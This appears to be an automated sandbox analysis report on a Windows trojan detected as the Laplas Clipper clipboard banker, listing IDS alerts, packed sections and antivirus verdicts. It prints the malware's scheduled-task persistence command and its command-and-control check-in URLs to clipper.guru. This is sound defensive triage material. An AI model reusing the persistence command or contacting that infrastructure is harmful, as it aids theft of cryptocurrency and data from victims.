Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Dec. 19, 2022, 6:08 p.m. | Dec. 19, 2022, 6:11 p.m. |
-
-
cmd.exe cmd.exe /C schtasks /create /tn CthDkNHxan /tr C:\Users\test22\AppData\Roaming\CthDkNHxan\SIAEwHQlys.exe /st 00:00 /du 9999:59 /sc once /ri 1 /f
2732-
schtasks.exe schtasks /create /tn CthDkNHxan /tr C:\Users\test22\AppData\Roaming\CthDkNHxan\SIAEwHQlys.exe /st 00:00 /du 9999:59 /sc once /ri 1 /f
2796
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
clipper.guru | 45.159.189.115 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.101:49167 -> 45.159.189.115:80 | 2039776 | ET MALWARE Laplas Clipper - SetOnline CnC Checkin | A Network Trojan was detected |
TCP 192.168.56.101:49167 -> 45.159.189.115:80 | 2024897 | ET USER_AGENTS Go HTTP Client User-Agent | Misc activity |
TCP 192.168.56.101:49167 -> 45.159.189.115:80 | 2039775 | ET MALWARE Laplas Clipper - Regex CnC Request | A Network Trojan was detected |
TCP 192.168.56.101:49167 -> 45.159.189.115:80 | 2024897 | ET USER_AGENTS Go HTTP Client User-Agent | Misc activity |
UDP 192.168.56.101:59002 -> 164.124.101.2:53 | 2039774 | ET MALWARE Laplas Clipper CnC Domain (clipper .guru) in DNS Lookup | Domain Observed Used for C2 Detected |
Suricata TLS
No Suricata TLS
section | XK#QA^#T |
section | ECAAOMCY |
section | J^Y)(&LB |
section | OA_$N*^X |
section | FOGX)TVS |
section | MMQ(#RTR |
section | $#TWEFDS |
section | NFL#_W^& |
section | %XAKVFQP |
request | GET http://clipper.guru/bot/online?guid=test22-PC\test22&key=dd611369e3344bc4aad751531e739d725fb32f33363f67a0bf7a4ea33213af63 |
request | GET http://clipper.guru/bot/regex?key=dd611369e3344bc4aad751531e739d725fb32f33363f67a0bf7a4ea33213af63 |
file | C:\Users\test22\AppData\Roaming\CthDkNHxan\SIAEwHQlys.exe |
cmdline | cmd.exe /C schtasks /create /tn CthDkNHxan /tr C:\Users\test22\AppData\Roaming\CthDkNHxan\SIAEwHQlys.exe /st 00:00 /du 9999:59 /sc once /ri 1 /f |
cmdline | schtasks /create /tn CthDkNHxan /tr C:\Users\test22\AppData\Roaming\CthDkNHxan\SIAEwHQlys.exe /st 00:00 /du 9999:59 /sc once /ri 1 /f |
file | C:\Users\test22\AppData\Roaming\CthDkNHxan\SIAEwHQlys.exe |
section | {u'size_of_data': u'0x00854000', u'virtual_address': u'0x00831000', u'entropy': 7.9808323913891765, u'name': u'$#TWEFDS', u'virtual_size': u'0x00853e90'} | entropy | 7.98083239139 | description | A section with a high entropy has been found | |||||||||
section | {u'size_of_data': u'0x0003ce00', u'virtual_address': u'0x01086000', u'entropy': 6.918001193067837, u'name': u'%XAKVFQP', u'virtual_size': u'0x0003cc28'} | entropy | 6.91800119307 | description | A section with a high entropy has been found | |||||||||
entropy | 0.999715067244 | description | Overall entropy of this PE file is high |
cmdline | cmd.exe /C schtasks /create /tn CthDkNHxan /tr C:\Users\test22\AppData\Roaming\CthDkNHxan\SIAEwHQlys.exe /st 00:00 /du 9999:59 /sc once /ri 1 /f |
cmdline | schtasks /create /tn CthDkNHxan /tr C:\Users\test22\AppData\Roaming\CthDkNHxan\SIAEwHQlys.exe /st 00:00 /du 9999:59 /sc once /ri 1 /f |
cmdline | cmd.exe /C schtasks /create /tn CthDkNHxan /tr C:\Users\test22\AppData\Roaming\CthDkNHxan\SIAEwHQlys.exe /st 00:00 /du 9999:59 /sc once /ri 1 /f |
cmdline | schtasks /create /tn CthDkNHxan /tr C:\Users\test22\AppData\Roaming\CthDkNHxan\SIAEwHQlys.exe /st 00:00 /du 9999:59 /sc once /ri 1 /f |
cmdline | cmd.exe /C schtasks /create /tn CthDkNHxan /tr C:\Users\test22\AppData\Roaming\CthDkNHxan\SIAEwHQlys.exe /st 00:00 /du 9999:59 /sc once /ri 1 /f |
cmdline | schtasks /create /tn CthDkNHxan /tr C:\Users\test22\AppData\Roaming\CthDkNHxan\SIAEwHQlys.exe /st 00:00 /du 9999:59 /sc once /ri 1 /f |
Bkav | W32.AIDetect.malware1 |
MicroWorld-eScan | Gen:Variant.Babar.82051 |
FireEye | Generic.mg.2160b328dfdbbe80 |
ALYac | Gen:Variant.Babar.82051 |
VIPRE | Gen:Variant.Babar.82051 |
Sangfor | Trojan.Win32.Save.a |
Cybereason | malicious.ab8183 |
BitDefenderTheta | Gen:NN.ZexaF.36106.@Z0@ain1xtji |
Symantec | ML.Attribute.HighConfidence |
Elastic | malicious (high confidence) |
APEX | Malicious |
Kaspersky | UDS:Trojan-Banker.Win32.ClipBanker.wpt |
BitDefender | Gen:Variant.Babar.82051 |
Avast | FileRepMalware [Trj] |
Ad-Aware | Gen:Variant.Babar.82051 |
Sophos | Generic ML PUA (PUA) |
McAfee-GW-Edition | BehavesLike.Win32.Generic.rc |
Trapmine | malicious.high.ml.score |
Emsisoft | Gen:Variant.Babar.82051 (B) |
SentinelOne | Static AI - Suspicious PE |
Gridinsoft | Trojan.Heur!.02212121 |
Arcabit | Trojan.Babar.D14083 |
ZoneAlarm | UDS:Trojan-Banker.Win32.ClipBanker.wpt |
GData | Gen:Variant.Babar.82051 |
Cynet | Malicious (score: 100) |
MAX | malware (ai score=83) |
Rising | Trojan.Generic@AI.88 (RDML:OB4qS+CxeaURKO5003Locg) |
MaxSecure | Trojan.Malware.300983.susgen |
AVG | FileRepMalware [Trj] |